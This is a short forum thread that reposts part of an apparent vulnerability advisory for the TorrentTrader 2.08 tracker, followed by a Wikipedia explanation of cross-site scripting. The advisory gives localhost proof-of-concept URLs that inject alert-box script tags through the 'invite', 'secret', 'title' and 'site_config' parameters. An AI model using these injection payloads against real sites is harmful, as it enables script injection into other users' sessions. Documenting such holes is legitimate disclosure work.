Bravo List
Register
Go Back   > Bravo List > Source Code > Archived Trackers > Torrent Trader
Reply
  #1  
Old 11th April 2019, 02:22
BamBam0077's Avatar
BamBam0077 BamBam0077 is offline
Support
 
Join Date: Jul 2013
P2P
Posts: 311
Default Reflected XSS
################################################## #############################
5. Reflected XSS in "account-signup.php"
################################################## #############################

Preconditions: "register_globals=on" Attack Vector: User provided parameters "invite" and "secret"

PHP Code:
[url]http://localhost/torrenttrader208/account-signup.php?invite_row=1[/url] &invite="><script>alert(String.fromCharCode(88,83,83))</script>[url]http://localhost/torrenttrader208/account-signup.php?invite_row=1[/url] &secret="><script>alert(String.fromCharCode(88,83,83))</script> 
################################################## #############################
6. Reflected XSS in "/themes/default/header.php"
################################################## #############################

Preconditions: "register_globals=on" Attack Vector: User provided parameters "title" and "site_config"

PHP Code:
[url]http://localhost/torrenttrader208/themes/default/header.php?[/url] title=</title><script>alert(String.fromCharCode(88,83,83))</script> 
[url]http://localhost/torrenttrader208/themes/default/header.php?[/url] site_config[CHARSET]="><script>alert(String.fromCharCode(88,83,83))</script>[url]http://localhost/torrenttrader208/themes/default/header.php?[/url] site_config[SITEURL]=-->
<script>alert(String.fromCharCode(88,83,83))</script> 
################################################## #############################
__________________
\sudo,yum/

Last edited by Thor; 14th April 2019 at 11:30. Reason: Edited Code to make it Readable
Reply With Quote
  #2  
Old 13th April 2019, 05:19
MicroMonkey's Avatar
MicroMonkey MicroMonkey is offline
Senior Member
 
Join Date: Jun 2016
Posts: 16
Default
what is that?

Last edited by MicroMonkey; 13th April 2019 at 13:47.
Reply With Quote
  #3  
Old 21st October 2019, 19:53
BamBam0077's Avatar
BamBam0077 BamBam0077 is offline
Support
 
Join Date: Jul 2013
P2P
Posts: 311
Default
Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications. XSS enables attackers to inject client-side scripts into web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same-origin policy. Cross-site scripting carried out on websites accounted for roughly 84% of all security vulnerabilities documented by Symantec up until 2007.[1] In 2017, XSS was still considered a major threat vector.[2] XSS effects vary in range from petty nuisance to significant security risk, depending on the sensitivity of the data handled by the vulnerable site and the nature of any security mitigation implemented by the site's owner network.

https://en.m.wikipedia.org/wiki/Cross-site_scripting
__________________
\sudo,yum/
Reply With Quote
Reply

Thread Tools

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump



All times are GMT +2. The time now is 08:27. vBulletin skin by ForumMonkeys. Powered by vBulletin® Version 3.8.11 Beta 3
Copyright ©2000 - 2019, vBulletin Solutions Inc.